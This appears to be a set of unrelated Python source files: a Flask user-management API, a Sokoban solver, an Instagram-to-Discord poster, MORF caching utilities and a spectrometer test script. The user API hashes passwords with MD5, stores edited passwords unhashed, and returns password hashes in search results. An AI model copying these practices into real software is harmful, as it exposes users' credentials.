Department.query.filter(\n Department.is_show == True,\n Department.is_deleted == False\n ).order_by(\n db.desc(Department.sort),\n db.desc(Department.id)\n ).all()\n for department_one in department_list_jc:\n department_item = department_one.__to_dict__(['id', \"name\"])\n department_dic[department_item[\"name\"]] = department_item['id']\n department_list.append(department_item[\"name\"])\n \"\"\"开始处理小程序发过来的数据\"\"\"\n data = data[\"data\"]\n \"\"\"验证数据\"\"\"\n if data[\"username\"] != '' and data['password'] != '' and data['department'] != '' and data['phone'] != '':\n if data[\"username\"] not in username_list and data['department'] in department_list:\n \"\"\"校验成功后对密码加密并添加数据\"\"\"\n ret = hashlib.md5(data[\"username\"].encode('utf-8')) # 获取用户名,利用不同的用户名来做动态盐 username也可以切片取\n ret.update(data['password'].encode('utf-8'))\n data['password'] = ret.hexdigest()\n \"\"\"下面如果飘背景颜色是正常的,因为还有值我没添加,让它自动生成\"\"\"\n user = Users(\n username=data[\"username\"],\n password=data['password'],\n mobile=data['phone'],\n department_id=department_dic[data['department']],\n )\n db.session.add(user) # 添加\n db.session.commit() # 提交执行\n return {'message': 'success', \"error\": \"\"}\n else:\n return {'message': 'fail', 'error': '用户已存在'}\n\n else:\n return {'message': 'fail', 'error': '有值未填写'}\n\n\n@jsonrpc.method(\"Edit.user(data=String)\")\ndef edit_user(data):\n \"\"\"\n 修改用户信息\n :param data: 用户修改发过来的值\n :return: 返回修改成功或失败\n \"\"\"\n \"\"\"拿出department表\"\"\"\n department_list = []\n department_dic = {}\n\n # 获取全部部门信息\n department_list_jc = Department.query.filter(\n Department.is_show == True,\n Department.is_deleted == False\n ).order_by(\n db.desc(Department.sort),\n db.desc(Department.id)\n ).all()\n for department_one in department_list_jc:\n department_item = department_one.__to_dict__(['id', \"name\"])\n department_dic[department_item[\"name\"]] = department_item['id']\n department_list.append(department_item[\"name\"])\n \"\"\"开始处理小程序发过来的数据\"\"\"\n data = data[\"data\"]\n \"\"\"验证数据\"\"\"\n if data[\"username\"] != '' and data['password'] != '' and data['department'] != '' and data['phone'] != '':\n if data['department'] in department_list:\n \"\"\"直接获取的是列表,里面包含着对象,要提取出来做单独对象才可以丢该\"\"\"\n user_jc = Users.query.filter(Users.username == data[\"username\"]).all()\n user = user_jc[0]\n user.username = data[\"username\"],\n user.password = data['password'],\n user.mobile = data['phone'],\n user.department_id = department_dic[data['department']],\n db.session.commit()\n return {'message': 'success', \"error\": \"\"}\n else:\n return {'message': 'fail', 'error': '修改失败'}\n\n else:\n return {'message': 'fail', 'error': '有值未填写'}\n\n\n@jsonrpc.method(\"Search.data(search_data=String)\")\ndef search_data(search_data):\n \"\"\"\n 模糊查询用户及电话号码,如果也要查询部门,则判断语句即可,或者在前端做选择让传过来的值有多个\n :param search_data: 用户名\n :return: 返回用户个人信息\n \"\"\"\n print(\"search_data--------->\", search_data, type(search_data))\n search_data_str = search_data[\"search_data\"]\n res_list = Users.query.filter(\n or_(Users.username.contains(search_data_str), (Users.mobile.contains(search_data_str)))).all()\n data = []\n for user in res_list:\n item = user.__to_dict__(['id', \"username\", 'password', 'mobile', 'department_id', 'create_time', 'update_time'])\n department_jc = Department.query.filter(Department.id == item[\"department_id\"]).all()\n for user_department in department_jc:\n \"\"\"将部门名称提取出来放到列表\"\"\"\n user_department_item = user_department.__to_dict__(['name'])\n item[\"department_name\"] = user_department_item[\"name\"]\n data.append(item)\n print(\"search_data_data------>\", data)\n return data\n\n\n@jsonrpc.method(\"Department.list\")\ndef department_list():\n \"\"\"\n 全部部门信息\n :return: 返回全部部门信息,并携带一个单独的部门名词列表\n \"\"\"\n department_list_jc = Department.query.filter(\n Department.is_show == True,\n Department.is_deleted == False\n ).order_by(\n db.desc(Department.sort),\n db.desc(Department.id)\n ).all()\n data = []\n department_name_dic = {}\n department_name_list = []\n for department in department_list_jc:\n item = department.__to_dict__(['id', \"name\", 'describe', 'user_list', 'create_time', 'update_time'])\n department_name_list.append(item['name'])\n data.append(item)\n department_name_dic[\"name_list\"] = department_name_list\n data.insert(0, department_name_dic)\n print(\"department_list_data--------->\", data)\n return data\n","sub_path":"flask_ubuntu/application/apps/index/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"106242700","text":"#!/bin/python3\n\nfrom treeNode import Node\nfrom state import State\nfrom mazeReader import MazeReader\nfrom heuristicsFactory import HeuristicsFactory\nfrom configFileReader import ConfigFileReader\nimport heapq\nimport sys\nfrom collections import deque\nfrom math import sqrt\nimport datetime as dt\n\ndef findNextStates(curr, goalSquares, maze, E, cornerSense = False):\n boxes = curr.state.boxes\n user = curr.state.user\n newStates = []\n for dir in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n moveCost = 0\n boxMoved = ()\n newBoxes = boxes\n hasChanged = False\n tdir = (user[0]+dir[0], user[1]+dir[1])\n t = maze[tdir[0]][tdir[1]]\n if tdir in boxes:\n ttdir = (user[0]+2*dir[0], user[1]+2*dir[1])\n tt = maze[ttdir[0]][ttdir[1]]\n moveCost+=1 \n if tt == ' ' or tt == '.' and ttdir not in boxes:\n hasChanged = True\n boxMoved = tdir\n elif t == ' ' or t == '.':\n moveCost+=2\n hasChanged = True\n if hasChanged:\n newUser = (user[0]+dir[0], user[1]+dir[1])\n if len(boxMoved) > 0:\n newBoxes = [b for b in boxes if b != tdir]\n newBoxes.append(ttdir)\n toBeAdded = State(newBoxes, newUser)\n if not toBeAdded in E:\n E.append(toBeAdded)\n if not cornerSense or not toBeAdded.hasUnmovableBox(maze, goalSquares):\n newStates.append(Node(p=curr, state=toBeAdded, g=curr.g + moveCost))\n return newStates\n\nclass Solver:\n\n def __init__(self, settings):\n self.settings = settings\n\n def solve(self, mazeFile):\n\n mr = MazeReader(mazeFile)\n\n Tr = mr.Tr\n Tr.g = 0\n\n maze = mr.Q0\n gS = mr.goalSquares\n\n BFS = self.settings['BFS']\n id = self.settings['IDDFS'] or self.settings['IDA*']\n A = self.settings['A*'] or self.settings['IDA*']\n GG = self.settings['GG']\n H = self.settings['H']\n depthStep = self.settings['IDDFS-Step']\n if not GG:\n def f(node):\n return node.g + node.h\n else:\n def f(node):\n return node.h\n\n heuristicsFactory = HeuristicsFactory(H, gS)\n h = heuristicsFactory.getHeuristic()\n\n Tr.h = h(Tr.state)\n Tr.f = f\n\n start = dt.datetime.now()\n\n if BFS:\n F = deque()\n else:\n F = []\n E = []\n F.append(Tr)\n E.append(Tr.state)\n if not id:\n solved = False\n Tr.f = f\n while len(F) > 0 and not solved:\n # # Uniform Cost Search\n if A or GG:\n curr = heapq.heappop(F)\n # BFS\n elif BFS:\n curr = F.popleft()\n # DFS\n else:\n curr = F.pop()\n if self.settings['PrintState'] == 1:\n curr.state.printState(maze)\n if curr.state.checkFinal(gS):\n solutionNode = curr\n solved = True\n totalTime = dt.datetime.now() - start\n else:\n newNodes = findNextStates(curr, gS, maze, E, self.settings['CornerSense'])\n for node in newNodes:\n node.f = f\n node.h = h(node.state)\n curr.children.append(node)\n # Uniform Cost Search\n if A or GG:\n heapq.heappush(F, node)\n # BFS, DFS\n else:\n F.append(node)\n\n elif not A: # iddfs\n\n limit = 1\n solved = False\n while limit < 1000 and not solved:\n F = []\n F.append([Tr, limit])\n while len(F)>0 and not solved:\n [curr, lim] = F.pop()\n if self.settings['PrintState'] == 1:\n curr.state.printState(maze)\n if lim <= 0:\n False\n elif curr.state.checkFinal(gS):\n solutionNode = curr\n solved = True\n totalTime = dt.datetime.now() - start\n else:\n if len(curr.children) > 0:\n newNodes = curr.children\n else:\n newNodes = findNextStates(curr, gS, maze, E, self.settings['CornerSense'])\n curr.children.extend(newNodes)\n F.extend([[node, lim-1] for node in newNodes])\n limit += depthStep\n\n else: # ida*\n solved = False\n limit = Tr.f(Tr)\n while limit < 1000 and not solved:\n F = []\n candidates = []\n heapq.heappush(F, Tr)\n while len(F)>0 and not solved:\n curr = heapq.heappop(F)\n if self.settings['PrintState'] == 1:\n curr.state.printState(maze)\n if curr.f(curr) > limit:\n candidates.append(curr.f(curr))\n elif curr.state.checkFinal(gS):\n solutionNode = curr\n solved = True\n totalTime = dt.datetime.now() - start\n else:\n if len(curr.children) > 0:\n newNodes = curr.children\n else:\n newNodes = findNextStates(curr, gS, maze, E, self.settings['CornerSense'])\n for node in newNodes:\n node.h = h(node.state)\n node.f = f\n curr.children.extend(newNodes)\n F.extend(newNodes)\n limit = min(candidates)\n if solved:\n p = solutionNode\n path = deque()\n while p is not None:\n path.appendleft(p.state)\n p = p.p\n for state in path:\n state.printState(maze)\n print(\"&&\")\n\n print(\"SUCCESFULLY SOLVED\\nTotal cost: %ld\\nSolution Depth: %ld\\nExpanded Nodes: %ld\\nRemaining Frontier: %ld\" \n % (solutionNode.g, len(path), len(E), len(F)))\n print(totalTime.total_seconds())\n else:\n print(\"NO SOLUTION\\nExpanded Nodes: %ld\\nRemaining Frontier: %ld\" \n % (len(E), len(F)))\n","sub_path":"TP1/python/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"472716988","text":"\nimport string\nimport random \n\n\ndef new_string(length):\n letters = string.ascii_lowercase+string.digits\n str = ''.join(random.choice(letters) for num in range(length))\n return str\n \n#print(get_random_string(10))\n\ndef string_gen ():\n strings = []\n number_of_strings = input(\"How many strings do you want to generate? \")\n minimum_length = input(\"What is the minimum length that you want? \")\n maximum_length = input(\"What is the max length that you want? \")\n \n while not number_of_strings.isnumeric(): \n print(\"We only accept numeric values.\")\n number_of_strings = input(\"How many strings do you want to generate?\")\n while not minimum_length.isnumeric(): \n print(\"We only accept numeric values. \")\n minimum_length = input(\"What the minimum length that you want? \")\n while not maximum_length.isnumeric(): \n print(\"We only accept numeric values. \")\n maximum_length = input(\"What is the max length that you want? \") \n \n number_of_strings = int(number_of_strings)\n minimum_length = int(minimum_length)\n maximum_length = int(maximum_length)\n \n while True: \n if maximum_length < minimum_length: \n print(\"Program reboots because your max is smaller than your minimum\")\n string_gen()\n break\n else: \n break\n \n final_length = [minimum_length, maximum_length]\n final_length = random.choice(final_length)\n \n while number_of_strings > 0:\n string = new_string(final_length)\n strings.append(string)\n number_of_strings = number_of_strings - 1\n \n return strings\n \nprint(string_gen())\n\n\n\n","sub_path":"module-1/Code-Simplicity-Efficiency/your-code/challenge-2_test.py","file_name":"challenge-2_test.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"48879024","text":"# Copyright (c) 2018 The Regents of the University of Michigan\n# and the University of Pennsylvania\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\nFunctions for caching data for MORF jobs.\n\"\"\"\n\nimport os\nimport subprocess\nimport shutil\nfrom urllib.parse import urlparse\nimport logging\nfrom morf.utils.docker import load_docker_image\nfrom morf.utils.log import set_logger_handlers, execute_and_log_output\nfrom morf.utils.s3interface import sync_s3_bucket_cache\n\nmodule_logger = logging.getLogger(__name__)\n\n\ndef make_course_session_cache_dir_fp(job_config, bucket, data_dir, course, session):\n fp = os.path.join(job_config.cache_dir, bucket, data_dir, course, session)\n return fp\n\n\ndef update_raw_data_cache(job_config):\n \"\"\"\n Update the raw data cache using the parameters in job_config; if job_config contains multiple raw data buckets, cache all of them.\n :param job_config: MorfJobConfig object.\n :return:\n \"\"\"\n # cache each bucket in a named directory within job_cache_dir\n for raw_data_bucket in job_config.raw_data_buckets:\n sync_s3_bucket_cache(job_config, raw_data_bucket)\n return\n\n\ndef update_proc_data_cache(job_config):\n \"\"\"\n Update the processed data cache using the parameters in job_config. Assumes job_config contains only a single proc_data_bucket.\n :param job_config: MorfJobConfig object.\n :return:\n \"\"\"\n proc_data_bucket = getattr(job_config, \"proc_data_bucket\", None)\n sync_s3_bucket_cache(job_config, proc_data_bucket)\n return\n\n\ndef fetch_from_cache(job_config, cache_file_path, dest_dir):\n \"\"\"\n Fetch a file from the cache for job_config into dest_dir, if it exists.\n :param job_config:\n :param cache_file_path: string, relative path to file in cache (this is identical to the directory path in s3; e.g. \"/bucket/path/to/somefile.csv\"\n :param dest_dir: absolute path of directory to fetch file into (will be created if not exists)\n :return: path to fetched file (string); return None if cache is not used.\n \"\"\"\n logger = set_logger_handlers(module_logger, job_config)\n logger.info(\"fetching file {} from cache\".format(cache_file_path))\n abs_cache_file_path = os.path.join(getattr(job_config, \"cache_dir\", None), cache_file_path)\n if hasattr(job_config, \"cache_dir\") and os.path.exists(abs_cache_file_path):\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n dest_fp = shutil.copy(abs_cache_file_path, dest_dir)\n else:\n logger.warning(\"file {} does not exist in cache\".format(abs_cache_file_path))\n dest_fp = None\n return dest_fp\n\n\ndef docker_cloud_login(job_config):\n \"\"\"\n Log into docker cloud using creds in job_config.\n :param job_config: MorfJobConfig object.\n :return: None\n \"\"\"\n cmd = \"docker login --username={} --password={}\".format(job_config.docker_cloud_username, job_config.docker_cloud_password)\n logger = set_logger_handlers(module_logger, job_config)\n execute_and_log_output(cmd, logger)\n return\n\n\ndef docker_cloud_push(job_config, image_uuid):\n \"\"\"\n Push image to Docker Cloud repo in job_config; tagging the image with its morf_id.\n :param job_config: MorfJobConfig object\n :param image_uuid: Docker image uuid\n :return: None\n \"\"\"\n logger = set_logger_handlers(module_logger, job_config)\n docker_cloud_repo_and_tag_path = \"{}:{}\".format(job_config.docker_cloud_repo, job_config.morf_id)\n # tag the docker image using the morf_id\n tag_cmd = \"docker tag {} {}\".format(image_uuid, docker_cloud_repo_and_tag_path)\n execute_and_log_output(tag_cmd, logger)\n # push the image to docker cloud\n push_cmd = \"docker push {}\".format(docker_cloud_repo_and_tag_path)\n execute_and_log_output(push_cmd, logger)\n return docker_cloud_repo_and_tag_path\n\n\ndef cache_to_docker_hub(job_config, dir, image_name):\n \"\"\"\n Push image to MORF repo in Docker Hub.\n :param job_config: MorfJobConfig object.\n :return: None\n \"\"\"\n logger = set_logger_handlers(module_logger, job_config)\n image_uuid = load_docker_image(dir, job_config, logger, image_name)\n docker_cloud_login(job_config)\n docker_cloud_repo_and_tag_path = docker_cloud_push(job_config, image_uuid)\n return docker_cloud_repo_and_tag_path\n","sub_path":"morf-python-api/morf/utils/caching.py","file_name":"caching.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"467900664","text":"import json\nimport requests\nimport os\nimport time\nimport datetime\n\n# Get users from users.txt :\nmy_file = open(\"users.txt\", \"r\")\nusers = my_file.read()\nmy_file.close()\nusers = users[1:]\nusers = users [:-1]\nusers = users.split(\",\")\ni = 0\nfor user in users:\n user = user.replace('\"', \"\")\n user = user.replace(\" \", \"\")\n users[i] = user\n i = i + 1\n\nfirstCheck = True\nWEBHOOK_URL = \"\" # Put your webhook URL here\nTIME_INTERVAL = \"300\"\nLAST_IMAGE_ID = {}\n\ndef get_profile_picture(html):\n return html.json()[\"graphql\"][\"user\"][\"profile_pic_url_hd\"]\n\ndef get_last_publication_url(html):\n return html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][0][\"node\"][\"shortcode\"]\n\ndef isVideo(html, selector):\n mediaType = html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"is_video\"]\n if(mediaType == True):\n mediaType = \"video\"\n else:\n mediaType = \"pic\"\n return(mediaType)\n\ndef get_embed(html, selector):\n embed = {}\n embed[\"color\"] = 15077485\n embed[\"title\"] = \"@\" + INSTAGRAM_USERNAME + \" posted a new \" + isVideo(html, selector)\n embed[\"url\"] = \"https://www.instagram.com/p/\" + html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"shortcode\"] +\"/\"\n try:\n embed[\"description\"] = html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"edge_media_to_caption\"][\"edges\"][0][\"node\"][\"text\"]\n except:\n embed[\"description\"] = \"\"\n embed[\"image\"] = {\"url\": html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"thumbnail_src\"]}\n embed[\"author\"] = {\"name\":f\"@{INSTAGRAM_USERNAME} (from Instagram)\", \"url\":f\"https://instagram.com/{INSTAGRAM_USERNAME}/\", \"icon_url\":get_profile_picture(html)}\n dt_object = datetime.datetime.fromtimestamp(html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"taken_at_timestamp\"])\n time = dt_object.strftime(\"%m/%d at %I:%M %p\")\n embed[\"footer\"] = {\"text\": \"• \" + time + \" (UTC Time)\", \"icon_url\": \"https://i.imgur.com/TqD7E3m.png\"}\n return embed\n\ndef webhook(webhook_url, html, selector):\n data = {}\n data[\"embeds\"] = []\n data[\"embeds\"].append(get_embed(html, selector))\n result = requests.post(webhook_url, data=json.dumps(\n data), headers={\"Content-Type\": \"application/json\"})\n try:\n result.raise_for_status()\n except requests.exceptions.HTTPError as err:\n print(err)\n else:\n print(\"Image successfully posted in Discord, code {}.\".format(\n result.status_code))\n\n\ndef get_instagram_html(INSTAGRAM_USERNAME):\n headers = {\n \"Host\": \"www.instagram.com\",\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11\"\n }\n html = requests.get(\"https://www.instagram.com/\" +\n INSTAGRAM_USERNAME + \"/channel/?__a=1\", headers=headers)\n try:\n test_json = html.json()[\"graphql\"]\n except:\n html = requests.get(\"https://www.instagram.com/\" +\n INSTAGRAM_USERNAME + \"/feed/?__a=1\", headers=headers)\n try:\n test_json = html.json()[\"graphql\"]\n except:\n print(\"JSON Error\")\n return html\n\n\ndef main():\n try:\n html = get_instagram_html(INSTAGRAM_USERNAME)\n if(firstCheck == True):\n print(\"First check, skipping the post\")\n LAST_IMAGE_ID[INSTAGRAM_USERNAME] = get_last_publication_url(html)\n elif(LAST_IMAGE_ID[INSTAGRAM_USERNAME] == get_last_publication_url(html)):\n print(\"Not new image to post in discord.\")\n else:\n print(\"New image to post in discord.\")\n i = 0\n delete = True\n for id_post in html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"]:\n id_post = id_post[\"node\"][\"shortcode\"]\n if(delete == True):\n if(id_post == LAST_IMAGE_ID[INSTAGRAM_USERNAME]):\n delete = False\n else:\n delete = True\n else:\n pass\n for post in html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"]:\n post = post[\"node\"][\"shortcode\"]\n if(post == LAST_IMAGE_ID[INSTAGRAM_USERNAME] or delete == True):\n LAST_IMAGE_ID[INSTAGRAM_USERNAME] = get_last_publication_url(html)\n return\n else:\n webhook(WEBHOOK_URL, get_instagram_html(INSTAGRAM_USERNAME), i)\n i = i + 1\n\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n if WEBHOOK_URL != None:\n while True:\n for user in users:\n INSTAGRAM_USERNAME = user\n main()\n if(firstCheck == True):\n firstCheck = False\n time.sleep(float(TIME_INTERVAL or 300))\n else:\n print('Please configure requirements variables properly!')","sub_path":"instagram-discord.py","file_name":"instagram-discord.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"571314094","text":"from pymongo import MongoClient\nimport datetime\nclient = MongoClient('localhost', 27017)#比较常用\ndb = client.test_database\ncollection = db.test_collection\n\npost = {\n \"author\": \"Mike\",\n \"text\":\"My first blog post!\",\n \"tags\":[\"mongodb\", \"python\", \"pymongo\"],\n \"date\":datetime.datetime.utcnow()\n}\n\nposts = db.posts\nposts.insert(post)\nnew_posts = [\n {\n \"author\": \"Mike\",\n \"text\": \"Another post!\",\n \"tags\": [\"bulk\", \"insert\"],\n \"date\": datetime.datetime(2009, 11, 12, 11, 14)\n },\n\n {\n \"author\": \"Eliot\",\n \"title\": \"MongoDB is fun\",\n \"text\": \"and pretty easy too!\",\n \"date\": datetime.datetime(2009, 11, 10, 10, 45)\n }\n]\nposts.insert(new_posts)\nprint(db.collection_names())\nprint(posts.find_one())\n\nfor post in posts.find():\n print(post)","sub_path":"PythonMongDb.py","file_name":"PythonMongDb.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"52280646","text":"import json\n\nfrom flask import Blueprint, g, abort, current_app, render_template, request, current_app\nfrom sqlalchemy import desc, func, and_, case\n\nfrom ..models import Player, PlayerMatchStats, SeasonStats, Season\nfrom ..core import db\nfrom . import login_required, admin_required\n\n\nplayers_bp = Blueprint('players', __name__)\n\n\ndef get_season_stats(cs_id, player):\n stats = player.season_stats[0]\n if player.season_stats[0].season_id != cs_id:\n return {'wins':0, 'losses':0, 'pts':1000}\n else:\n return stats\n\n@players_bp.route('//', methods=['GET'])\n@players_bp.route('//overview', methods=['GET'])\ndef overview(steam_id):\n p = Player.query.get(steam_id)\n if not p:\n return abort(404)\n cs_id = Season.current().id\n stats = PlayerMatchStats.query.join(SeasonStats).filter(SeasonStats.steam_id==steam_id)\\\n .order_by(desc(PlayerMatchStats.match_id)).limit(8)\n pts_seq = PlayerMatchStats.query.join(SeasonStats).filter(and_(SeasonStats.season_id==cs_id,\n SeasonStats.steam_id==steam_id)).order_by(PlayerMatchStats.match_id)\\\n .values(PlayerMatchStats.old_pts+PlayerMatchStats.pts_diff)\n pts_hist = [[0, 1000]]\n for index, el in enumerate(pts_seq):\n pts_hist.append([index+1, el[0]])\n rating_info = p.get_avg_rating()[0]\n avg_rating = rating_info[0] or 0\n rating_amount = rating_info[1]\n signature_heroes = p.get_heroes(cs_id).order_by(desc('played')).limit(3).all()\n matches_stats = stats.all()\n season_stats = get_season_stats(cs_id, p)\n return render_template('player_overview.html', player=p, season_stats=season_stats, avg_rating=avg_rating,\n rating_amount=rating_amount, signature_heroes=signature_heroes, matches_stats=matches_stats,\n pts_history=json.dumps(pts_hist))\n\n\n@players_bp.route('//matches', methods=['GET'])\ndef matches(steam_id):\n p = Player.query.get(steam_id)\n if not p:\n return abort(404)\n _args = {'player': p}\n page = request.args.get('page', '1')\n if not page.isdigit():\n abort(400)\n page = int(page)\n hero_filter = request.args.get('hero', None)\n cs_id = Season.current().id\n matches_stats = PlayerMatchStats.query.order_by(desc(PlayerMatchStats.match_id))\\\n .join(SeasonStats).filter(SeasonStats.steam_id==steam_id)\n if hero_filter:\n _args['hero_filter'] = hero_filter\n matches_stats = matches_stats.filter(PlayerMatchStats.hero==hero_filter)\n _args['matches_stats'] = matches_stats.paginate(page, \n current_app.config['PLAYER_HISTORY_MATCHES_PER_PAGE'], True)\n rating_info = p.get_avg_rating()[0]\n _args['avg_rating'] = rating_info[0] or 0\n _args['rating_amount'] = rating_info[1]\n _args['season_stats'] = get_season_stats(cs_id, p)\n return render_template('player_matches.html', **_args)\n\n\n@players_bp.route('//heroes', methods=['GET'])\ndef heroes(steam_id):\n p = Player.query.get(steam_id)\n if not p:\n return abort(404)\n _sort = request.args.get('sort', 'played')\n if _sort not in ['hero', 'played', 'pts_diff', 'winrate', 'kda']:\n _sort = 'played'\n order_by = _sort\n _desc = request.args.get('desc', 'yes')\n if _desc != 'no':\n _desc = 'yes'\n order_by = desc(order_by)\n _args = {'player': p, 'sort':_sort, 'desc':_desc}\n hero_filter = request.args.get('hero', None)\n cs_id = Season.current().id\n heroes_stats = p.get_heroes(cs_id).order_by(order_by).all()\n _args['heroes_stats'] = heroes_stats\n rating_info = p.get_avg_rating()[0]\n _args['avg_rating'] = rating_info[0] or 0\n _args['rating_amount'] = rating_info[1]\n _args['season_stats'] = get_season_stats(cs_id, p)\n return render_template('player_heroes.html', **_args)\n","sub_path":"gleague/frontend/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"423924425","text":"\"\"\"Routines for running Edward's spectrometer using the Leiker/Force\nI/O card for Raspberry Pis\"\"\"\n#from threading import Thread, Lock\n#lck = Lock()\nfrom scipy.optimize import curve_fit\nfrom datetime import datetime\nimport time\nfrom spectrometer import *\nimport os\n\nclass SignalGenerator:\n \"\"\"Routines for use with the Hittite syntesizer\n frequencies in MHz and power in dBm\"\"\"\n def __init__(self, ipAddress=\"192.168.0.30\"):\n self.lanio = \"lanio \" + ipAddress + \" \"\n self.freq = 0.0\n\n def setFreq(self, freq):\n \"\"\"Set the signal generator frequency in MHz\"\"\"\n os.system(self.lanio + \"\\\":FREQ \" + str(freq) + \" MHz\\\"\")\n self.freq = freq\n\n def getFreq(self):\n \"\"\"Get the signal generator frequency in MHz\"\"\"\n return float(os.popen(self.lanio + \"\\\"FREQ?\\\"\").read()) / 1000000\n\n def setPower(self, pwr):\n \"\"\"Set the signal generator power in dBm. \n With the Httite, stay above -42 dBm\"\"\"\n\n os.system(self.lanio + \"\\\":POW \" + str(pwr) + \" dBm\\\"\")\n os.system(self.lanio + \"\\\":OUTP 1\\\"\")\n\n def powerOff(self):\n os.system(self.lanio + \"\\\":OUTP 0\\\"\")\n\n def getPower(self):\n return os.system(self.lanio + \"\\\"POW?\\\"\")\n\nclass TestSpectrometer:\n def __init__(self,spec, sg):\n self.spec = spec\n self.sg = sg\n self.zeroFit = np.array([0.0,0.0])\n self.Tsys = np.empty(6)\n\n def getFileName(self):\n antennaNumber = os.uname()[1][-1:]\n timestamp = datetime.now().strftime(\"%F_%H-%M-%S\")\n return \"SS%c_%d_Data_%s\" % (antennaNumber, self.spec.number, timestamp)\n\n def gaussian(self, x, amp, cen, wid):\n return amp * np.exp(-(((x-cen)/wid)**2) /2)\n \n def measureFilter(self, freq=10, power = -25, plot=True):\n \"\"\"Measure the yig fiklter response by doing 5 scans offset by 5MHz\n to get a more accurate measurement\"\"\"\n numPoints=7\n numFreqs=5\n vals = np.zeros(numPoints*numFreqs, dtype=np.int16)\n freqs = np.zeros(numPoints*numFreqs, dtype=float)\n savefStart = self.spec.fStart\n self.sg.setFreq(freq*1000)\n self.sg.powerOff()\n self.spec.sweep()\n zeros=np.copy(self.spec.vals)\n self.sg.setPower(power)\n for n in range(numFreqs):\n self.spec.fStart = savefStart + n* self.spec.df/numFreqs\n self.spec.sweep()\n if n == 0:\n ch0 = np.argmax(self.spec.vals) - int(numPoints/2)\n zero = np.average(zeros[ch0:ch0+numPoints])\n vals[n: numPoints*numFreqs:numFreqs] = self.spec.vals[ch0:ch0+numPoints] - zero\n freqs[n: numPoints*numFreqs:numFreqs] = self.spec.freqs[ch0:ch0+numPoints]\n self.spec.fStart=savefStart\n ch0 = np.argmax(vals)\n init_vals = [vals[ch0], freqs[ch0], .012]\n [amp, ctr, wid], covar = curve_fit(self.gaussian, freqs, vals, p0=init_vals)\n if plot:\n print(\"amp %d ctr %.4f, wid %.4f\" % (amp, ctr, wid))\n plt.plot(freqs, vals, label = \"measured data\")\n plt.plot(freqs, self.gaussian(freqs, amp, ctr, wid), label = \"Gaussian fit\")\n plt.legend()\n plt.show(block=False)\n else:\n return((freq, amp, ctr, wid))\n # np.savetxt('filter.txt', np.c_[freqs, vals], fmt = \"%.3f %d\")\n # print np.c_[freqs, vals,]\n \n def measureFrequencyScale(self, fStart=4.5, fStop=16.1, df=1):\n \"\"\" Measure the yig filter's response to a series of frequencies.\n Print frequency, amplitude, measured center freq and sigma of a gaussian\n fit. save in the file \"yigMeasurements\" in the current directory.\n Solve for a linear fit to the measured frequencies and suggest changes\n to the file yigConstants for the current spectrometer.\"\"\"\n\n d = []\n for f in np.arange(fStart, fStop, df):\n v = self.measureFilter(f, plot=False)\n d.append(v)\n print(\"%.2f %d %.4f %.5f\" % (v[0],v[1], v[2], v[3]))\n dt = np.array(d).transpose()\n coef = np.polyfit(dt[0], dt[2], 1)\n print(coef)\n print(\"change yig.freqOffset from %.4f to %.4f\" % (self.spec.yig.freqOffset, self.spec.yig.freqOffset-coef[1]))\n print(\"change yig.scaleFactor from %.5f to %.5f\" % (self.spec.yig.scaleFactor, self.spec.yig.scaleFactor/coef[0]))\n np.savetxt(\"yigMeasurements\", d, \"%.2f %d %.4f %.5f\")\n\n def showPeak(self):\n ch = np.argmax(self.spec.vals)\n print(\"The peak is %d at %.3f GHz\" % (self.spec.vals[ch], self.spec.freqs[ch]))\n \n# def runTwo():\n# print time.time()\n# p0 = 